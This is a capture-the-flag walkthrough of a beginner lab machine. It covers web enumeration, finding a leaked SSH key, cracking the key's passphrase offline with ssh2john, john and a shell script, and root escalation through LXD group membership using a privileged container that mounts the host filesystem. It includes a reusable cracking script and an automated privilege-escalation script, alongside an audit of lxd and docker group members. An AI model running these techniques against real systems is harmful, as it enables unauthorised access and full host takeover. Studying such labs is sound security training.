
Gaming Server

An easy Boot2root machine for beginners.

Recon

We start with a port scan using nmap:

$nmap -sCV --min-rate 5000 -p22,80 -Pn 10.10.192.142 -oN targeted
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-04 11:44 -03
Nmap scan report for 10.10.192.142
Host is up (0.41s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 34:0e:fe:06:12:67:3e:a4:eb:ab:7a:c4:81:6d:fe:a9 (RSA)
|   256 49:61:1e:f4:52:6e:7b:29:98:db:30:2d:16:ed:f4:8b (ECDSA)
|_  256 b8:60:c4:5b:b7:b2:d0:23:a0:c7:56:59:5c:63:1e:c4 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: House of danak
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.40 seconds

To begin with, let's take a look at the source code of the page, where we find a comment left by the devs.

From this we can deduce that there is a user named john.

Investigating a little more, we see that the site has a directory /uploads containing a file dict.lst, which appears to be a dictionary of passwords.

Using Gobuster we find another directory, /secret, which holds an RSA private key:

===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.192.142
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirb/small.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/04 11:52:08 Starting gobuster in directory enumeration mode
===============================================================
/secret               (Status: 301) [Size: 315] [--> http://10.10.192.142/secret/]
/uploads              (Status: 301) [Size: 316] [--> http://10.10.192.142/uploads/]
Progress: 959 / 960 (99.90%)
===============================================================
2023/07/04 11:52:47 Finished
===============================================================

We copy the key to our machine and restrict its permissions with chmod 600 id_rsa (ssh refuses to use a key readable by other users).

With this key we try to log in with ssh -i id_rsa john@10.10.192.142, but we are prompted for a passphrase: the private key is encrypted.

Since we already have a dictionary of likely passphrases (dict.lst from /uploads), we can use ssh2john to convert the key into a hash format john understands:

ssh2john id_rsa > hash

Then we run john against that hash with dict.lst as the wordlist, which recovers the passphrase protecting the RSA key.
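The cracking step above, as an added example that is not part of the original writeup: a small shell script that does by hand what ssh2john and john do together, trying each candidate passphrase from a wordlist until the key decrypts. It assumes the key is either a classic PEM-encrypted key (checked with openssl) or a new-style "OPENSSH PRIVATE KEY" (checked with ssh-keygen); the demo function builds its own throwaway key and a constructed wordlist rather than touching the target's id_rsa and dict.lst.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): offline dictionary attack on a
# passphrase-protected SSH private key, i.e. what ssh2john + john do, done
# one guess at a time with the system's own tools. File names are placeholders.

# try_passphrase KEY PASSPHRASE -> exit 0 if PASSPHRASE decrypts KEY
try_passphrase() {
    local key="$1" pw="$2"
    if grep -q 'BEGIN OPENSSH PRIVATE KEY' "$key"; then
        # ssh-keygen -y prints the public key only when the passphrase is right
        ssh-keygen -y -P "$pw" -f "$key" >/dev/null 2>&1
    else
        # classic PEM / PKCS#8: openssl cannot load the key with a wrong passphrase
        openssl rsa -in "$key" -passin "pass:$pw" -noout >/dev/null 2>&1
    fi
}

# crack_key KEY WORDLIST -> prints the passphrase and exits 0, or exits 1
# when the wordlist is exhausted. Nothing here touches the target: the
# attack is entirely offline, so no failed logins show up in its auth log.
crack_key() {
    local key="$1" wordlist="$2" pw tries=0
    while IFS= read -r pw || [ -n "$pw" ]; do
        tries=$((tries + 1))
        if try_passphrase "$key" "$pw"; then
            printf '%s\n' "$pw"
            echo "found after $tries candidates" >&2
            return 0
        fi
    done < "$wordlist"
    echo "exhausted $tries candidates without a hit" >&2
    return 1
}

# crack_demo -> generates a throwaway key protected by "gamer123" and a
# constructed five-word list (sample data, not the target's dict.lst),
# then cracks it. Prints the recovered passphrase.
crack_demo() {
    local dir rc
    dir=$(mktemp -d)
    openssl genrsa -aes128 -passout pass:gamer123 -out "$dir/id_rsa" 2048 2>/dev/null
    printf '%s\n' password 123456 letmein gamer123 qwerty > "$dir/dict.lst"
    if crack_key "$dir/id_rsa" "$dir/dict.lst"; then rc=0; else rc=1; fi
    rm -rf "$dir"
    return "$rc"
}

# Real usage: source this file, then  crack_key id_rsa dict.lst
```

john is far faster on long lists because it implements the key derivation itself instead of spawning a process per guess; the point of the script is to make visible what the tool hides: a passphrase-protected key is only as strong as its passphrase, and once the key file has leaked (here from a web-served /secret directory) the guessing happens entirely on the attacker's machine.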

Privilege Escalation

Now we can log in via ssh and start with the privilege escalation.

We obtain the first flag.

With the id command we see that we are a member of the lxd group. A little research shows that LXD treats membership in this group as root-equivalent on the host (anyone who can talk to the LXD socket can create privileged containers), so we can escalate privileges through it.

On our attacking machine:

sudo su
# Install the requirements
sudo apt update
sudo apt install -y git golang-go debootstrap rsync gpg squashfs-tools
# Clone the repo
git clone https://github.com/lxc/distrobuilder
# Build distrobuilder
cd distrobuilder
make
# Prepare the Alpine image build
mkdir -p $HOME/ContainerImages/alpine/
cd $HOME/ContainerImages/alpine/
wget https://raw.githubusercontent.com/lxc/lxc-ci/master/images/alpine.yaml
# Build the image (produces lxd.tar.xz and rootfs.squashfs)
sudo $HOME/go/bin/distrobuilder build-lxd alpine.yaml -o image.release=3.18

Then, we upload the files lxd.tar.xz and rootfs.squashfs to the vulnerable machine.

We import the image on the target:

lxc image import lxd.tar.xz rootfs.squashfs --alias alpine
lxc image list # the newly imported image should be listed

We create a privileged container and mount the host's root filesystem into it:

lxc init alpine privesc -c security.privileged=true
lxc list # list the container

lxc config device add privesc host-root disk source=/ path=/mnt/root recursive=true

We start the container and get a shell in it:

lxc start privesc
lxc exec privesc /bin/sh
cd /mnt/root # the victim's whole filesystem is mounted here, and we are root inside the container

And that's it: from this root shell everything under /mnt/root is the host's filesystem, readable and writable as root.

If any part of the privilege escalation doesn't work for you, see the HackTricks GitHub repository and investigate for yourselves.
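The escalation above as one script, added here and not part of the original writeup, with the pre-flight checks a practitioner wants (lxd group membership, lxc client present, image files present) and a cleanup step, plus the check a defender runs afterwards: listing every member of the lxd and docker groups in /etc/group, since both groups hand out root on the host. The image alias, container name and mount path are the writeup's; the /etc/group content in the demo is constructed sample data.

```shell
#!/usr/bin/env bash
# Added example (not from the original writeup): the lxd-group escalation
# with checks and cleanup, and the audit that finds exposed accounts.

# in_group NAME "GROUPS" -> 0 if NAME appears in the space-separated GROUPS
# list; pass "$(id -Gn)" to test the current user.
in_group() {
    local want="$1" g
    for g in $2; do
        [ "$g" = "$want" ] && return 0
    done
    return 1
}

# root_equivalent_members GROUPFILE -> prints "group:user" for every member
# of a group that is root-equivalent on the host (lxd and docker both are).
root_equivalent_members() {
    awk -F: '$1 == "lxd" || $1 == "docker" {
        n = split($4, users, ",")
        for (i = 1; i <= n; i++) if (users[i] != "") print $1 ":" users[i]
    }' "$1"
}

# lxd_privesc [ALIAS] [NAME] -> the writeup's steps, guarded. Needs
# lxd.tar.xz and rootfs.squashfs (built with distrobuilder) in the cwd.
lxd_privesc() {
    local alias="${1:-alpine}" name="${2:-privesc}"
    in_group lxd "$(id -Gn)" || { echo "not in the lxd group" >&2; return 1; }
    command -v lxc >/dev/null 2>&1 || { echo "lxc client not found" >&2; return 1; }
    [ -f lxd.tar.xz ] && [ -f rootfs.squashfs ] || { echo "image files missing" >&2; return 1; }

    lxc image import lxd.tar.xz rootfs.squashfs --alias "$alias"
    # security.privileged=true: uid 0 in the container is uid 0 on the host
    lxc init "$alias" "$name" -c security.privileged=true
    # mount the host's / inside the container, writable
    lxc config device add "$name" host-root disk source=/ path=/mnt/root recursive=true
    lxc start "$name"
    lxc exec "$name" /bin/sh
}

# lxd_cleanup [NAME] [ALIAS] -> remove the container and image left behind
lxd_cleanup() {
    lxc delete --force "${1:-privesc}" 2>/dev/null
    lxc image delete "${2:-alpine}" 2>/dev/null
}

# audit_demo -> runs the audit over a constructed /etc/group (sample data,
# not the target's) and prints the exposed accounts, one per line.
audit_demo() {
    local tmp
    tmp=$(mktemp)
    cat > "$tmp" <<'EOF'
root:x:0:
adm:x:4:syslog,john
lxd:x:108:john,dev
docker:x:999:
sudo:x:27:admin
EOF
    root_equivalent_members "$tmp"
    rm -f "$tmp"
}
```

On a real host run root_equivalent_members /etc/group; any account listed that is not meant to be an administrator is a finding, and the fix is to take it out of the group (gpasswd -d john lxd) rather than to harden the container defaults, because the socket access is what grants root.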
